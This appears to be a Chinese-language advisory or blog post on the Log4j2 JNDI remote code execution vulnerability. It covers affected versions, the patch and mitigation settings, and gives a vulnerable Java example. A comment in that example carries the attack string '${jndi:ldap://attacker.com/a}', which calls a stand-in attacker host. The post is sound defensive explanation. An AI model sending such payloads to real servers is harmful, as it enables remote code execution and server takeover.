Apache Log4j2 核弹级漏洞
近日,Apache Log4j2 的远程代码执行漏洞刷爆朋友圈,该漏洞一旦被攻击者利用会造成严重危害。而且此次漏洞影响巨大,很多网站如百度等都是此次 Log4j 远程代码执行漏洞的受害者,很多互联网企业也都连夜做了应急措施。
漏洞详情:
Apache Log4j 远程代码执行漏洞
严重程度: 严重
由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置
漏洞情况分析:
Apache Log4j是一个基于Java的日志记录组件。Apache Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。
2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。
漏洞编号:暂缺
漏洞等级:
高危,该漏洞影响范围极广,危害极大。
CVSS评分:10(最高级)
漏洞状态:
受影响的版本:
Apache log4j2 2.0 - 2.14.1 版本均受影响。
安全版本:
Apache log4j-2.15.0-rc2
易受攻击代码示例:
import org.apache.log4j.Logger;
import java.io.*;
import java.sql.SQLException;
import java.util.*;
public class VulnerableLog4jExampleHandler implements HttpHandler {
static Logger log = Logger.getLogger(log4jExample.class.getName());
/**
* A simple HTTP endpoint that reads the request's User Agent and logs it back.
* This is basically pseudo-code to explain the vulnerability, and not a full example.
* @param he HTTP Request Object
*/
public void handle(HttpExchange he) throws IOException {
string userAgent = he.getRequestHeader("user-agent");// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
log.info("Request User Agent:" + userAgent);
String response = "<h1>Hello There, " + userAgent + "!</h1>";
he.sendResponseHeaders(200, response.length());
OutputStream os = he.getResponseBody();
os.write(response.getBytes());
os.close();
}
}漏洞修复方案:
Apache官方已发布补丁,建议受影响的用户尽快升级到安全版本。
补丁下载地址:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
漏洞缓解措施:
(1)jvm参数 -Dlog4j2.formatMsgNoLookups=true
(2)log4j2.formatMsgNoLookups=True
因该组件使用极为广泛,利用门槛很低,危害极大,建议所有用户尽快升级到安全版本。
Apache Log4j2 核弹级漏洞相关推荐
- 【java】log4j2核弹级漏洞原理和分析
1.概述 转载:log4j2核弹级漏洞原理和分析 并且补充. 2.漏洞是怎么发现的? 3.漏洞问题重现 依赖如下 <dependencies><!-- https://mvnrepo ...
- Log4j2核弹级漏洞线上修复方案!
一.漏洞描述2月9日晚,Apache Log4j2反序列化远程代码执行漏洞细节已被公开,Apache Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利 ...
- log4j2核弹级漏洞靶场复现(反弹shell)
环境搭建: 本次漏洞复现采用vulfocus的log4j2靶场docker 使用Kali系统进行复现实验 搭建docker拉取漏洞镜像可参考以下链接: https://blog.csdn.net/we ...
- JDK 商用正式免费、Log4j2 爆核弹级漏洞、LayUI 下线...2021 发生的 10 件大事。。。
首先祝大家新年快乐,假期都玩的开心吧? 去年栈长给大家盘点了<Java 开发行业 2020 年发生的几件大事>,2022 年来了,也必须对 2021 做个总结了,2021 年 " ...
- Log4j 爆发“核弹级”漏洞、工信部力推开源软件发展、“龙腾计划”启动|开源月报 Vol. 02...
「WeOpen Insight」是腾源会全新推出的"开源趋势与开源洞见"内容专栏,不定期为读者呈现开源圈内的第一手快讯.优质工具盘点等,洞察开源技术发展的风向标,预见未来趋势. P ...
- Coinbase 现“市场核弹级”漏洞,颁发25万美元奖励
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 密币交易平台 Coinbase 将其史上最大的漏洞奖励25万美元发给发现可使用户出售他人比特币的"市场核弹级"漏洞. Coi ...
- [ 新出漏洞篇 ] 核弹级漏洞 Log4j2 RCE 漏洞爆出,开发圈苦逼,安全圈过年,你赶上了吗 ?(外行都能看懂的漏洞分析)
Log4j2相信大家不陌生了~~~哈哈哈哈. 相信大家已经被 Log4j2 的重大漏洞刷屏了.几乎没有互联网公司幸免. 估计有不少开发的小伙伴在此前为了修 bug 已经累趴下了. 估计也有不少安全圈的 ...
- 核弹级漏洞!我把log4j扒给你看!
相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一 ...
- 核弹级漏洞,把 log4j 扒给你看!
作者 | 轩辕之风O 来源 | 编程技术宇宙 相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业, ...
最新文章
- [leetcode]1007. 行相等的最少多米诺旋转
- instance在ceph对应pool的位置查询
- 用OPENCV视觉解数独
- c语言打印删除空格,新人提问:如何将输出时每行最后一个空格删除
- Ubuntu 安装 Redis (非源码Build方式)
- ManyToManyField的注意事项和如何建立索引
- Werkzeug routing
- 为什么你从来没做过发起人?
- Android P Beta!您想要知道的所有更新内容都在这里
- Deep Learning 论文笔记 (3): Deep Learning Face Attributes in the Wild
- 联想“重组症”:仅靠重组是不够的
- zotero文献管理器及其使用姿势(不定时更新)
- OSChina 周三乱弹 —— 别人介绍了个妹纸 现在……
- JAVA扫码点餐(1)-项目介绍
- arcgis 属性表中起点终点创建线_一种GIS单线路网自动生成双线路网的方法与流程...
- 55个美丽而独特的网站页眉设计欣赏
- 我发现一个地方能免费领取价值198元的手环,具有能量并且有高人加持过的,只要关注微信就可以免费领取
- java中的clear()
- 5 个行为让你更好...
- 爱因斯坦的题目:在你面前有一条长长的阶梯,如果每步跨2阶,那么最后剩1阶;如果每步跨3阶,那么最后剩2阶.....................